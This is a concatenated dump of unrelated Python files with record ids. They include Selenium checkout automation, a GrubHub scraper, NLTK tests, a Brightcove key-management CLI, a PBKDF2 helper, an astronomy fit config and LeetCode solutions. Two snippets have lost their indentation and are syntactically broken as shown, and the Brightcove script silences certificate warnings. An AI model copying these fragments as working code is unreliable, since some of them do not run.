        logger.info('Adding Product to cart')
        # add to cart
        self.automation.driver.execute_script("document.querySelectorAll('#add_to_cart button')[0].click()")
        time.sleep(2)
        # proceed to checkout
        logger.info('proceed to checkout')
        self.automation.wait.until(
            EC.presence_of_element_located((By.CSS_SELECTOR, '.button-container .btn.btn-default.button.button-medium')))
        self.automation.driver.execute_script("document.querySelectorAll('.button-container "
                                              ".btn.btn-default.button.button-medium')[0].click()")

    def proceed_to_checkout_and_payment(self):
        """
        proceed to checkout and confirm order
        wizard : 1-summary ==> 2-sign in ==> 3-address ==> 4-shipping ==> 5-Payment
        :return:
        """
        # 1- summary
        logger.info('starting wizard with summary')
        self.automation.wait.until(
            EC.presence_of_element_located((By.CSS_SELECTOR, '.cart_navigation a.standard-checkout')))
        self.automation.driver.execute_script("document.querySelectorAll('.cart_navigation a.standard-checkout')[0]"
                                              ".click()")
        # 2-sign in & 3-address
        logger.info('2-sign in & 3-address')
        self.automation.wait.until(
            EC.presence_of_element_located((By.CSS_SELECTOR, 'button[name="processAddress"]')))
        self.automation.driver.find_element_by_css_selector('button[name="processAddress"]').click()
        # 4- shipping
        logger.info('4- shipping')
        self.automation.wait.until(
            EC.presence_of_element_located((By.CSS_SELECTOR, '#uniform-cgv span')))
        is_checked = self.automation.driver.find_element_by_css_selector('#uniform-cgv span').get_attribute('class')
        if not is_checked:  # agree
            self.automation.driver.execute_script("document.querySelectorAll('#cgv')[0].click()")
        self.automation.driver.find_element_by_css_selector('button[name=processCarrier]').click()
        logger.info('agree and confirmed')
        # pay by bank wire
        logger.info('pay by bank wire')
        self.automation.wait.until(
            EC.presence_of_element_located((By.CSS_SELECTOR, '.payment_module a')))
        self.automation.driver.find_element_by_css_selector('.payment_module a').click()
        # 5- payment and confirm
        logger.info('5- payment and confirm')
        self.automation.wait.until(
            EC.presence_of_element_located((By.CSS_SELECTOR, '#cart_navigation button')))
        self.automation.driver.find_element_by_css_selector('#cart_navigation button').click()
        # back to orders
        logger.info('back to orders')
        self.automation.wait.until(
            EC.presence_of_element_located((By.CSS_SELECTOR, 'p.cart_navigation .button-exclusive.btn')))
        self.automation.driver.find_element_by_css_selector('p.cart_navigation .button-exclusive.btn').click()
        # how many items do you have
        time.sleep(1.5)
        self.automation.wait.until(
            EC.presence_of_element_located((By.CSS_SELECTOR, '#order-list tbody tr')))
        items = self.automation.driver.find_elements_by_css_selector('#order-list tbody tr')
        logger.info(f'You have "{len(items)}" at your order')
|
11,028 | a648fe22a1390ae0dfab40eb270201660d2cd3be | # You are given an unordered array consisting of consecutive integers [1, 2, 3, ..., n] without any duplicates. You are allowed to swap any two elements. You need to find the minimum number of swaps required to sort the array in ascending order.
# For example, given the array we perform the following steps:
# i arr swap (indices)
# 0 [7, 1, 3, 2, 4, 5, 6] swap (0,3)
# 1 [2, 1, 3, 7, 4, 5, 6] swap (0,1)
# 2 [1, 2, 3, 7, 4, 5, 6] swap (3,4)
# 3 [1, 2, 3, 4, 7, 5, 6] swap (4,5)
# 4 [1, 2, 3, 4, 5, 7, 6] swap (5,6)
# 5 [1, 2, 3, 4, 5, 6, 7]
# It took 5 swaps to sort the array.
# Function Description
# Complete the function minimumSwaps in the editor below. It must return an integer representing the minimum number of swaps to sort the array.
# minimumSwaps has the following parameter(s):
# arr: an unordered array of integers
# Input Format
# The first line contains an integer, , the size of .
# The second line contains space-separated integers .
# Constraints
# Output Format
# Return the minimum number of swaps to sort the given array.
# Sample Input 0
# 4
# 4 3 1 2
# Sample Output 0
# 3
def minimumSwaps(arr):
    """Return the minimum number of swaps needed to sort `arr`, a
    permutation of 1..n, into ascending order.

    Uses cycle resolution: keep swapping the element at position i into
    its home slot until position i is settled.  NOTE: sorts `arr` in place
    as a side effect.
    """
    swaps = 0
    pos = 0
    size = len(arr)
    while pos < size:
        home = arr[pos] - 1  # where the current value belongs
        if home == pos:
            pos += 1  # settled: advance
        else:
            arr[pos], arr[home] = arr[home], arr[pos]
            swaps += 1
    return swaps
11,029 | c23bfd7bc6d05085652d9f3ca7fe83fc964666b2 | # -*- encoding: utf-8 -*-
#!/usr/bin/env python
#########################################################################
# File Name: ScrapeGrubHubByCity.py
# Author: Bryant Shih
# mail: hs2762@columbia.edu
# Created Time: Mon Oct 18 12:15:01 2015
#########################################################################
import sys
from writeExcel import excelWriteObj
from scrapePages import webObj
from chromeDriver import openChromePage
try:
import cPickle as pickle
except:
import pickle
if(__name__ == '__main__'):
    # Scrape restaurant data from grubhub.com for every zip code of the
    # requested city and collect results into one Excel workbook.
    # NOTE: this is Python 2 code (print statements below).
    city = sys.argv[1] #string as parameter ex. 'HARTFORD'
    #load city-zip code dictionary
    with open('City2ZipCode.pkl', 'rb') as fg:
        city2zipCodes = pickle.load(fg)
    #get zip codes list stored in pickle file already
    if(not city.upper() in city2zipCodes):
        print city + 'is not in our options, please use another city as input'
    #list the # of zip codes for each city
    #for city in city2zipCodes.keys():
        #print '# of zip codes in ' + city + ' is ' + str(len(city2zipCodes[city]))
    print 'Creating an excel file with name "' + city + '_restaurant_data.xls" for storing data scraped...'
    xlObj = excelWriteObj(city)
    print 'Data scraping on grubhub.com for ' + city +' is about to start...'
    for zipCode in city2zipCodes[city.upper()]:
        print '--Scraping data for zip code ' + zipCode + ' ...'
        # drive Chrome to the search page for this zip code and grab the URL
        chromeDriverObj = openChromePage(zipCode)
        url = chromeDriverObj.getUrl()
        url = url.replace('&facet=open_now:true', '') #delete the condition to get all restaurant data no matter it open or not now.
        #print 'url: ' + url
        #get url for delivery category
        delUrl = url.replace('pickup', 'delivery')
        delUrl = delUrl.replace('PICKUP', 'DELIVERY')
        delUrl = delUrl.replace('&facet=open_now:true', '')
        delResultPage = webObj(delUrl)
        delResultPage.switchAndScrapePages()
        xlObj.writeData(delResultPage.getData())
        #transfer url to pickup category
        pickUpUrl = url.replace('delivery', 'pickup')
        pickUpUrl = pickUpUrl.replace('DELIVERY', 'PICKUP')
        #add '&radius=1' to url
        pickUpResultPage = webObj(pickUpUrl)
        pickUpResultPage.switchAndScrapePages()
        xlObj.writeData(pickUpResultPage.getData())
        print '--Scraping data for zip code ' + zipCode + ' is done'
    print 'Data scraping on grubhub.com for ' + city +' is finieshed!!'
11,030 | 67d254f80885c599471b621aaf741da01851dd8b | import rimg as RIMG
import apil as APIL
import simg as SIMG
from random import randint
class random:
    """Random-image endpoints; thin pass-throughs to the RIMG helper module.

    NOTE: this class shadows the stdlib `random` module name, and the
    method signatures shadow the builtins min/max -- kept for API compat.
    """

    def anime(source=False, min="1", max=False, check=True):
        out = RIMG.random.anime(source=source,min=min,max=max,check=check)
        return out

    def neko(source=False, min="1", max=False, check=True):
        # NOTE(review): this delegates to RIMG.random.anime, not a neko
        # endpoint -- looks like a copy/paste slip; confirm against RIMG.
        out = RIMG.random.anime(source=source,min=min,max=max,check=check)
        return out

    class pat:
        """Pat-gif endpoints."""
        def static():
            return RIMG.random.pat.static()
        def animated():
            return RIMG.random.pat.animated()

    class hug:
        """Hug-gif endpoints."""
        def static():
            return RIMG.random.hug.static()
        def animated():
            return RIMG.random.hug.animated()
class search:
    """Search endpoints; thin pass-throughs to the SIMG helper module."""

    def anime(num, source=False):
        # forward straight to the SIMG backend
        return SIMG.search.anime(num=num, source=source)

    def neko(num, source=False):
        return SIMG.search.neko(num, source=source)
# Note: this API MAY (although it is unlikely) return NSFW results.
# If that happens, DM my owner (LazyNeko#5644) or join the Neko Support Server from the website.
# #-------------------------------------------------#
# To join: Copy the below link.
# https://discord.gg/RauzUYK
# #--------------------------------------------------#
# You may edit this code to your needs. I dont mind ;3
# TODO: make requests smaller (DONE)
# TODO: make "hug"&"pat" animated&static endpoint! (DONE)
# TODO: make all endpoints seperate files (DONE, WIP1)
#print(search.neko(randint(1,10),True)) #DEBUG 2 (SEARCH WITH SOURCE)
#print(random.anime()) #CHECK FOR SOURCE-ONLY!
def version():
    """Return the library version string stored in version.txt.

    The original leaked the file handle (open() without close); the
    with-block closes it deterministically.
    """
    with open("version.txt", "r") as fh:
        return str(fh.read())
|
11,031 | 6f99bbcd45da72644709b74413b50b52367f2a47 | from Scenes import Scene
from pygame.locals import *
class PlaySceneMulti(Scene):
    """Multiplayer variant of the play scene; currently adds no state or
    behaviour beyond the base Scene."""

    def __init__(self, gameController):
        super(PlaySceneMulti, self).__init__(gameController)
|
11,032 | 71b61f7ac25b76e91c93f2967f9ca6935c5da8d3 | """
Tests for nltk.pos_tag
"""
import unittest
from nltk import pos_tag, word_tokenize
class TestPosTag(unittest.TestCase):
    """Tests for nltk.pos_tag: English and Russian, default and
    'universal' tagsets, and error handling for unsupported languages."""

    def test_pos_tag_eng(self):
        """English text with the default (Penn Treebank) tagset."""
        text = "John's big idea isn't all that bad."
        expected_tagged = [
            ("John", "NNP"),
            ("'s", "POS"),
            ("big", "JJ"),
            ("idea", "NN"),
            ("is", "VBZ"),
            ("n't", "RB"),
            ("all", "PDT"),
            ("that", "DT"),
            ("bad", "JJ"),
            (".", "."),
        ]
        assert pos_tag(word_tokenize(text)) == expected_tagged

    def test_pos_tag_eng_universal(self):
        """English text mapped onto the coarse 'universal' tagset."""
        text = "John's big idea isn't all that bad."
        expected_tagged = [
            ("John", "NOUN"),
            ("'s", "PRT"),
            ("big", "ADJ"),
            ("idea", "NOUN"),
            ("is", "VERB"),
            ("n't", "ADV"),
            ("all", "DET"),
            ("that", "DET"),
            ("bad", "ADJ"),
            (".", "."),
        ]
        assert pos_tag(word_tokenize(text), tagset="universal") == expected_tagged

    def test_pos_tag_rus(self):
        """Russian text with the default Russian tagset."""
        text = "Илья оторопел и дважды перечитал бумажку."
        expected_tagged = [
            ("Илья", "S"),
            ("оторопел", "V"),
            ("и", "CONJ"),
            ("дважды", "ADV"),
            ("перечитал", "V"),
            ("бумажку", "S"),
            (".", "NONLEX"),
        ]
        assert pos_tag(word_tokenize(text), lang="rus") == expected_tagged

    def test_pos_tag_rus_universal(self):
        """Russian text mapped onto the 'universal' tagset."""
        text = "Илья оторопел и дважды перечитал бумажку."
        expected_tagged = [
            ("Илья", "NOUN"),
            ("оторопел", "VERB"),
            ("и", "CONJ"),
            ("дважды", "ADV"),
            ("перечитал", "VERB"),
            ("бумажку", "NOUN"),
            (".", "."),
        ]
        assert (
            pos_tag(word_tokenize(text), tagset="universal", lang="rus")
            == expected_tagged
        )

    def test_pos_tag_unknown_lang(self):
        """Unsupported languages must raise NotImplementedError."""
        text = "모르겠 습니 다"
        self.assertRaises(NotImplementedError, pos_tag, word_tokenize(text), lang="kor")
        # Test for default kwarg, `lang=None`
        self.assertRaises(NotImplementedError, pos_tag, word_tokenize(text), lang=None)

    def test_unspecified_lang(self):
        """With no lang given, the English tagger runs and mis-tags Korean."""
        # Tries to force the lang='eng' option.
        text = "모르겠 습니 다"
        expected_but_wrong = [("모르겠", "JJ"), ("습니", "NNP"), ("다", "NN")]
        assert pos_tag(word_tokenize(text)) == expected_but_wrong
|
11,033 | 8744ca1e8e368c0fa4fa6a7abb09693d74b3cad1 | try:
print(7 / 0)
except ZeroDivisionError:
print('Поймано исключение - деление на ноль')
except:
print('Поймано какое-то исключение')
finally:
print('Блок Finally')
try:
if True:
raise TypeError
except TypeError:
print('Поймано наше исключение')
print('Программа завершена', 2, 'Qwerty')
|
11,034 | 1f396e4837dd6621e828143b6ce4588fb680a8e2 | """
Created on Fri May 26 12:00:17 2017
@author: Ian
"""
# Embed the experiment-db.dat contents into two generated files: a C file
# (from cTemplate.txt) and a Python module (from template.py).
f = open('/reg/g/psdm/data/ExpNameDb/experiment-db.dat', 'r')
a = f.read()  # full database text, later padded line-by-line
f.close()
cTemplate = open("cTemplate.txt","r")
newCFile = cTemplate.read()  # C template with DATASIZE/STRING placeholders
cTemplate.close()
g = open('template.py')
apple = g.read()  # Python template with a STRING placeholder
g.close()
# re-read the database line by line for the C-string conversion
f = open("/reg/g/psdm/data/ExpNameDb/experiment-db.dat", "r")
dataLines = f.readlines()
newlineRemoved = []
for line in dataLines:
    # strip line endings for the C literal
    new = line.replace('\n','')
    new = new.replace('\r','')
    newlineRemoved.append(new)
    # pad trailing spaces in the Python copy: replace each original line
    # with its space-stripped form plus a single trailing space
    art = line.rstrip(' ') + ' '
    a = a.replace(line,art)
f.close()
# build one C string literal with explicit \n escapes between lines
cFormattedData = ""
for line in newlineRemoved:
    cFormattedData = cFormattedData + line + "\\n"
dataLength = str(len(cFormattedData))
newCFile = newCFile.replace('DATASIZE',dataLength)
newCFile = newCFile.replace('STRING',cFormattedData)
cFile = open("updatedCFile.c","w")
cFile.write(newCFile)
cFile.close()
# emit the Python module with the padded database text spliced in
pear = apple.replace('STRING', a)
h = open('ExpNameData.py', 'w')
h.write(pear)
h.close()
|
11,035 | 5777667687154c854005ba97efbe85b569968555 | #!/usr/bin/env python3
import sys
import argparse
from pprint import pprint
from brightcove.OAuth import OAuth
from brightcove.Key import Key
from brightcove.utils import load_account_info
# disable certificate warnings
import urllib3
urllib3.disable_warnings()
# init the argument parsing
parser = argparse.ArgumentParser(prog=sys.argv[0])
parser.add_argument('--list', action='store_true', default=False, help='List all keys in account')
parser.add_argument('--add', metavar='<key data>', type=str, help='Add a key to account')
parser.add_argument('--delete', metavar='<key ID|all>', type=str, help='Delete a key by ID or all')
parser.add_argument('--config', metavar='<config filename>', type=str, help='Name and path of account config information file')
parser.add_argument('--account', metavar='<Brightcove Account ID>', type=str, help='Brightcove Account ID to use (if different from ID in config)')

# parse the args
args = parser.parse_args()

# get account info from config file
try:
    account_id, client_id, client_secret, _ = load_account_info(args.config)
except Exception as e:
    print(e)
    sys.exit(2)

# if account ID was provided override the one from config
account_id = args.account or account_id

# create a JWT API instance
jwt = Key( OAuth(account_id=account_id,client_id=client_id, client_secret=client_secret) )

# delete one or all keys
if args.delete:
    if args.delete=='all':
        keyList = jwt.ListPublicKeys().json()
        for sub in keyList:
            print(jwt.DeletePublicKey(key_id=sub['id']).text)
    else:
        print(jwt.DeletePublicKey(key_id=args.delete).text)

# add a key: read the PEM file named by --add, dropping the armor lines
if args.add:
    private_key = ''
    try:
        with open(args.add, 'r') as file:
            lines = file.readlines()
            for line in lines:
                if not '-----' in line:
                    private_key += line.strip()
    except OSError:
        # BUG FIX: the original referenced the nonexistent args.keyfile
        # here, raising AttributeError inside the handler; the path lives
        # in args.add.  Also narrowed the bare except to OSError.
        print(f'Error trying to access private keyfile "{args.add}".')
        sys.exit(2)
    print(jwt.RegisterPublicKey(key_data=private_key).text)

# show all keys
if args.list:
    pprint(jwt.ListPublicKeys().json())
|
11,036 | 57c11f70814f576f80f66ee23afaab734daca156 | # /*************** <auto-copyright.pl BEGIN do not edit this line> *************
# *
# * VE-Suite is (C) Copyright 1998-2007 by Iowa State University
# *
# * Original Development Team:
# * - ISU's Thermal Systems Virtual Engineering Group,
# * Headed by Kenneth Mark Bryden, Ph.D., www.vrac.iastate.edu/~kmbryden
# * - Reaction Engineering International, www.reaction-eng.com
# *
# * This library is free software; you can redistribute it and/or
# * modify it under the terms of the GNU Library General Public
# * License as published by the Free Software Foundation; either
# * version 2 of the License, or (at your option) any later version.
# *
# * This library is distributed in the hope that it will be useful,
# * but WITHOUT ANY WARRANTY; without even the implied warranty of
# * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# * Library General Public License for more details.
# *
# * You should have received a copy of the GNU Library General Public
# * License along with this library; if not, write to the
# * Free Software Foundation, Inc., 59 Temple Place - Suite 330,
# * Boston, MA 02111-1307, USA.
# *
# * -----------------------------------------------------------------
# * Date modified: $Date$
# * Version: $Rev$
# * Author: $Author$
# * Id: $Id$
# * -----------------------------------------------------------------
# *
# *************** <auto-copyright.pl END do not edit this line> **************
"""Data structure for VE-Launcher's Dependencies."""
import wx
from velBase import *
class DepsArray:
    """Holds VE-Launcher dependency entries, persisted via wx.Config."""

    def __init__(self, defArray = None):
        # use the supplied list when given, otherwise load from the config
        if defArray is not None:
            self.array = defArray
        else:
            self.array = self.ReadEntries()

    def __len__(self):
        """Number of dependency entries."""
        return len(self.array)

    def Add(self, entry):
        """Append a dependency entry."""
        self.array.append(entry)

    def Delete(self, entry):
        """Remove the first matching dependency entry."""
        self.array.remove(entry)

    def GetNames(self):
        """Return the underlying list of entries."""
        return self.array

    def ReadEntries(self):
        """Reads the list of dependencies from the config's Deps folder."""
        entries = []
        config = wx.Config.Get()
        config.SetPath(DEPS_CONFIG)
        more, name, index = config.GetFirstEntry()
        while more:
            entries.append(config.Read(name))
            more, name, index = config.GetNextEntry(index)
        config.SetPath('..')
        return entries

    def WriteConfig(self):
        """Writes the entire list to config, replacing the old group."""
        config = wx.Config.Get()
        config.DeleteGroup(DEPS_CONFIG)
        config.SetPath(DEPS_CONFIG)
        for pos, entry in enumerate(self.array):
            config.Write("Dependency%s" % pos, entry)
        config.SetPath('..')
|
11,037 | c62b90303aae692b6588b9ccb2a4c4ee740656b4 | from django.forms import ModelForm
from .models import AircraftType
class AircraftTypeForm(ModelForm):
    """Model form for creating/editing an AircraftType; exposes only the
    name field (help text is user-facing and kept in Russian)."""

    class Meta:
        model = AircraftType
        fields = ['name']
        help_texts = {'name': 'Название типа воздушного судна'}
|
11,038 | 931df4c1b357bb8e44bd54db1ada90b2e2583b29 |
import base64
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
from django.conf import settings
def generate_password_key(password):
    """Derive a urlsafe-base64-encoded 32-byte key from `password` using
    PBKDF2-HMAC-SHA256 with settings.SALT as the salt and 100000
    iterations.  `password` may be str or bytes (see get_bytes)."""
    # password = b"password"
    kdf = PBKDF2HMAC(
        algorithm=hashes.SHA256(),
        length=32,
        salt=get_bytes(settings.SALT),
        iterations=100000, )
    key = base64.urlsafe_b64encode(kdf.derive(get_bytes(password)))
    return key
def get_bytes(v):
    """Coerce `v` to bytes: bytes pass through, str is UTF-8 encoded,
    anything else raises TypeError."""
    if isinstance(v, bytes):
        return v
    if isinstance(v, str):
        return v.encode("utf-8")
    raise TypeError(
        "SALT & PASSWORD must be specified as strings that convert nicely to "
        "bytes."
    )
11,039 | e960b8c8e5b32cf090e1fb02f0ea1f1732c35e25 | ne1=input("Numarul curent elev: ")
ne2=input("Numarul curent elev: ")
ne3=input("Numarul curent elev: ")
np1=input("punctajul elevului ")
np2=input("punctajul elevului ")
np3=input("punctajul elevului ")
|
11,040 | 47d3243f2d180357bcdaf0cfb5f0bd9e508178b9 | #!/bin/python3
#
# kyosk.py
#
# Author: Mauricio Matamoros
# Date: 2023.02.14
# License: MIT
#
# Plays a video file using VLC with the Raspberry Pi
#
import vlc
import time
player = vlc.MediaPlayer()
video = vlc.Media('/home/pi/videos/video.mp4')
player.set_media(video)
player.play()
# play() returns immediately; give VLC a moment to actually start playback.
time.sleep(1)
# BUG FIX: is_playing is a method -- the bare bound-method attribute is always
# truthy, so the original loop could never terminate.  Call it, and sleep a
# real interval instead of busy-waiting with sleep(0).
while player.is_playing():
    time.sleep(0.5)
|
11,041 | ed53740811486556584b0f17f52ff59c089dc227 | import pickle
from serializar_objetos import Vehiculo
# Load the pickled list of cars and report each one's status.
with open("losCoches", "rb") as fichero:
    misCoches = pickle.load(fichero)
for coche in misCoches:
    print(coche.estado())
11,042 | 135a17c32209281628ca1c8fa1d66f2bcdabc018 | from flask_sqlalchemy import SQLAlchemy
from flask_mail import Mail
from flask import Flask
# The app and extension singletons live in their own module so blueprints
# can import them without circular-import problems.
app = Flask(__name__)
db = SQLAlchemy()
mail = Mail()
|
11,043 | c822fa6b1fa22522050fd9c640b728494121a528 | from corehq import feature_previews, toggles
from corehq.apps.custom_data_fields.models import CustomDataFieldsDefinition
from corehq.apps.fixtures.dbaccessors import get_fixture_data_type_by_tag, get_fixture_items_for_data_type
from corehq.apps.linked_domain.util import _clean_json
from corehq.apps.locations.views import LocationFieldsView
from corehq.apps.products.views import ProductFieldsView
from corehq.apps.users.models import UserRole
from corehq.apps.users.views.mobile import UserFieldsView
def get_toggles_previews(domain):
    """Return the toggle and feature-preview slugs enabled for *domain*."""
    enabled_toggles = list(toggles.toggles_dict(domain=domain))
    enabled_previews = list(feature_previews.previews_dict(domain=domain))
    return {'toggles': enabled_toggles, 'previews': enabled_previews}
def get_custom_data_models(domain, limit_types=None):
    """Collect custom-data field definitions for location/product/user types.

    Returns a dict keyed by field type. Types not listed in *limit_types*
    (when given) are skipped, as are types with no stored definition.
    """
    fields = {}
    for field_view in [LocationFieldsView, ProductFieldsView, UserFieldsView]:
        field_type = field_view.field_type
        if limit_types and field_type not in limit_types:
            continue
        model = CustomDataFieldsDefinition.get(domain, field_type)
        if not model:
            continue
        fields[field_type] = [
            {
                'slug': field.slug,
                'is_required': field.is_required,
                'label': field.label,
                'choices': field.choices,
                'regex': field.regex,
                'regex_msg': field.regex_msg,
            }
            for field in model.get_fields()
        ]
    return fields
def get_fixture(domain, tag):
    """Look up a fixture data type by *tag* and return it with its items.

    NOTE(review): if no data type matches the tag, the helper presumably
    returns None and the ``._id`` access below will raise -- confirm callers.
    """
    data_type = get_fixture_data_type_by_tag(domain, tag)
    items = get_fixture_items_for_data_type(domain, data_type._id)
    return {"data_type": data_type, "data_items": items}
def get_user_roles(domain):
    """Return every UserRole in *domain* as a cleaned JSON-able dict."""
    return [_clean_json(role.to_json()) for role in UserRole.by_domain(domain)]
|
11,044 | 3a0641f4bab362e4777dbc87dc0cd4c8035f6871 | def factors(x):
c=[1]
for i in range(2,x//2+1):
if x%i==0:
c.append(i)
return c
def calc(num):
    """Return the sum of num // x for x in 2..num (0 when num < 2).

    BUG FIX: the original computed ``num // x`` but discarded the result,
    so ``total`` stayed 0 and every call returned 0.
    """
    total = 0
    for x in range(2, num + 1):
        total += num // x
    return total
# Read a case count, then one integer per case; print calc() for each,
# and finally the proper divisors of 10**9.
n = int(input())
for _ in range(n):
    num = int(input())
    print(calc(num))
print(factors(10**9))
11,045 | 0109fe82bd8dd6b3b0fb8d176166033b5730ace8 | # Example Keplerian fit configuration file
# Required packages for setup
import os
import pandas as pd
import numpy as np
import radvel
import os
# Define global planetary system and dataset parameters
starname = 'HD75732_2planet'
nplanets = 2    # number of planets in the system
instnames = ['k','j']    # list of instrument names. Can be whatever you like but should match 'tel' column in the input file.
ntels = len(instnames)  # number of instruments with unique velocity zero-points
fitting_basis = 'per tc secosw sesinw k'    # Fitting basis, see radvel.basis.BASIS_NAMES for available basis names
bjd0 = 0.0   # time offset subtracted from the timestamps (none here)
planet_letters = {1: 'a', 2:'b'}
# Define prior centers (initial guesses) here.
params = radvel.RVParameters(nplanets,basis='per tc e w k')    # initialize RVparameters object
params['per1'] = 14.6521      # period of 1st planet
params['tc1'] = 2074.31       # time of inferior conjunction of 1st planet
params['e1'] = 0.01           # eccentricity of 1st planet
params['w1'] = np.pi/2.       # argument of periastron of the star's orbit for 1st planet
params['k1'] = 70.39          # velocity semi-amplitude for 1st planet
params['per2'] = 3847.22      # period of 2nd planet
params['tc2'] = 4441.57       # time of inferior conjunction of 2nd planet
params['e2'] = 0.19           # eccentricity of 2nd planet
params['w2'] = np.pi/2.       # argument of periastron of the star's orbit for 2nd planet
params['k2'] = 31.65          # velocity semi-amplitude for 2nd planet
# Planets 3-5 kept commented out for possible future fits:
##params['per3'] = 44.3886 # period of 3rd planet
##params['tc3'] = 2083.6 # time of inferior conjunction of 3rd planet
##params['e3'] = 0.35 # eccentricity of 3rd planet
##params['w3'] = np.pi/2. # argument of periastron of the star's orbit for 3rd planet
##params['k3'] = 10.73 # velocity semi-amplitude for 3rd planet
##
##params['per4'] = 2.81739 # period of 4th planet
##params['tc4'] = 1086.73 # time of inferior conjunction of 4th planet
##params['e4'] = 0.04 # eccentricity of 4th planet
##params['w4'] = np.pi/2. # argument of periastron of the star's orbit for 4th planet
##params['k4'] = 5.57 # velocity semi-amplitude for 4th planet
##
##params['per5'] = 259.7 # period of 5th planet
##params['tc5'] = 2094.83 # time of inferior conjunction of 5th planet
##params['e5'] = 0.0 # eccentricity of 5th planet
##params['w5'] = np.pi/2. # argument of periastron of the star's orbit for 5th planet
##params['k5'] = 5.0 # velocity semi-amplitude for 5th planet
params['dvdt'] = 3.82108e-05     # slope
params['curv'] = -9.57252e-08    # curvature
params['gamma_k'] = 0.0       # velocity zero-point for hires_rk
params['jit_k'] = 2.6         # jitter for hires_rk
params['gamma_j'] = 1.02395   # "       "   hires_rj
params['jit_j'] = 7.83348     # "       "   hires_rj
# Load radial velocity data; the resulting dataframe must have
# 'time', 'mnvel', 'errvel', and 'tel' keys.
data = pd.read_csv('C:/users/rscsa/Research/radvel-master/research/HD75732/HD75732.csv')
#data = rv[24:653] #rj data
data['time'] = data.jd
data['mnvel'] = data.mnvel
data['errvel'] = data.errvel
data['tel'] = data.tel
# Set parameters to be held constant (default is for all parameters to vary).
# Must be defined in the fitting basis; uncomment an entry to freeze it.
vary = dict(
    #dvdt =False,
    #curv =False,
    #jit_j =False,
    #per1 =False,
    #tc1 =False,
    #secosw1 =False,
    #sesinw1 = False,
    #e1=False,
    #w1=False,
    #k1=False
    #per2 = False,
    #tc2 = False,
    #secosw2 = False,
    #sesinw2 = False
)
# Define prior shapes and widths here.
priors = [
    radvel.prior.EccentricityPrior( nplanets ),           # Keeps eccentricity < 1
    radvel.prior.PositiveKPrior( nplanets ),             # Keeps K > 0
    radvel.prior.Gaussian('per1',params['per1'],.25*params['per1']),
    radvel.prior.Gaussian('per2',params['per2'],.25*params['per2']),
##    radvel.prior.Gaussian('per3',params['per3'],.25*params['per3']),
##    radvel.prior.Gaussian('per4',params['per4'],.25*params['per4']),
##    radvel.prior.Gaussian('per5',params['per5'],.25*params['per5']),
    radvel.prior.HardBounds('jit_j', 0.0, 15.0),
    radvel.prior.HardBounds('jit_k', 0.0, 15.0)
]
time_base = np.mean([np.min(data.time), np.max(data.time)])   # abscissa for slope and curvature terms (should be near mid-point of time baseline)
# optional argument that can contain stellar mass and
# uncertainties. If not set, mstar will be set to nan.
# stellar = dict(mstar=1.12, mstar_err= 0.05)
# optional argument that can contain planet radii, used for computing densities
# planet = dict(
#     rp1=5.68, rp_err1=0.56,
#     rp2=7.82, rp_err2=0.72,
# )
|
11,046 | 8f666a0d092f0039e338468778a7e41b46effbcd | """
Given an array of positive integers nums, remove the smallest subarray (possibly empty) such that the sum of the remaining elements is divisible by p. It is not allowed to remove the whole array.
Return the length of the smallest subarray that you need to remove, or -1 if it's impossible.
A subarray is defined as a contiguous block of elements in the array.
Example 1:
Input: nums = [3,1,4,2], p = 6
Output: 1
Explanation: The sum of the elements in nums is 10, which is not divisible by 6. We can remove the subarray [4], and the sum of the remaining elements is 6, which is divisible by 6.
Example 2:
Input: nums = [6,3,5,2], p = 9
Output: 2
Explanation: We cannot remove a single element to get a sum divisible by 9. The best way is to remove the subarray [5,2], leaving us with [6,3] with sum 9.
Example 3:
Input: nums = [1,2,3], p = 3
Output: 0
Explanation: Here the sum is 6. which is already divisible by 3. Thus we do not need to remove anything.
Example 4:
Input: nums = [1,2,3], p = 7
Output: -1
Explanation: There is no way to remove a subarray in order to get a sum divisible by 7.
Example 5:
Input: nums = [1000000000,1000000000,1000000000], p = 3
Output: 0
Constraints:
1 <= nums.length <= 105
1 <= nums[i] <= 109
1 <= p <= 109
"""
class Solution:
    def minSubarray(self, nums, p: int) -> int:
        """Brute force: try every removal length using prefix sums mod p.

        O(n^2) -- correct but too slow for the largest inputs (TLE).
        """
        n = len(nums)
        prefix = [0]
        running = 0
        for value in nums:
            running = (running + value) % p
            prefix.append(running)
        total = prefix[-1]
        # Smallest window first: return as soon as one removal works.
        for window in range(n):
            for start in range(n - window + 1):
                if (total - (prefix[start + window] - prefix[start])) % p == 0:
                    return window
        return -1
class Solution:
    def minSubarray(self, nums, p: int) -> int:
        """O(n): shortest subarray whose sum is congruent to sum(nums) mod p.

        Tracks the last index at which each prefix-sum residue was seen.
        """
        tmp, length = 0, len(nums)
        total = sum(nums)
        if total < p:
            # All elements are positive, so any allowed removal leaves a
            # remaining sum in (0, p) -- never divisible by p.
            return -1
        elif total % p == 0:
            # Already divisible: remove the empty subarray.
            return 0
        else:
            # Residue the removed subarray's sum must match.
            total = total % p
        pos_dict = {0: 0}  # prefix residue -> latest 1-based end index
        res = length
        for i in range(1, length+1):
            tmp = (tmp + nums[i-1]) % p
            # A window ending at i works iff some earlier prefix had this residue.
            target = (tmp - total) % p
            if target in pos_dict:
                res = min(res, i - pos_dict[target])
            pos_dict[tmp] = i
        # res == length would mean removing the whole array, which is not allowed.
        return res if res != length else -1
class Solution:
    def minSubarray(self, A, p):
        """One pass: shortest window whose sum is congruent to sum(A) mod p."""
        need = sum(A) % p
        last_seen = {0: -1}   # prefix residue -> latest index
        prefix_mod = 0
        n = len(A)
        best = n
        for idx, value in enumerate(A):
            prefix_mod = (prefix_mod + value) % p
            last_seen[prefix_mod] = idx
            want = (prefix_mod - need) % p
            if want in last_seen:
                best = min(best, idx - last_seen[want])
        # best == n would remove the whole array, which is forbidden.
        return best if best < n else -1
# Exercise the last-defined Solution against the sample cases.
S = Solution()
for nums, p in [
    ([3, 1, 4, 2], 6),
    ([6, 3, 5, 2], 9),
    ([1, 2, 3], 3),
    ([1, 2, 3], 7),
    ([1000000000, 1000000000, 1000000000], 3),
    ([4, 4, 2], 7),
    ([8, 32, 31, 18, 34, 20, 21, 13, 1, 27, 23, 22, 11, 15, 30, 4, 2], 148),
]:
    print(S.minSubarray(nums, p))
11,047 | 62edaffc121a6f311b5faa8b7d7f76c29b5b37af | import numpy as np
import seaborn as sns
import pandas as pd
from plotly import graph_objects as go
from matplotlib.axes._subplots import SubplotBase
from matplotlib import pyplot as plt
from itertools import accumulate
import cv2
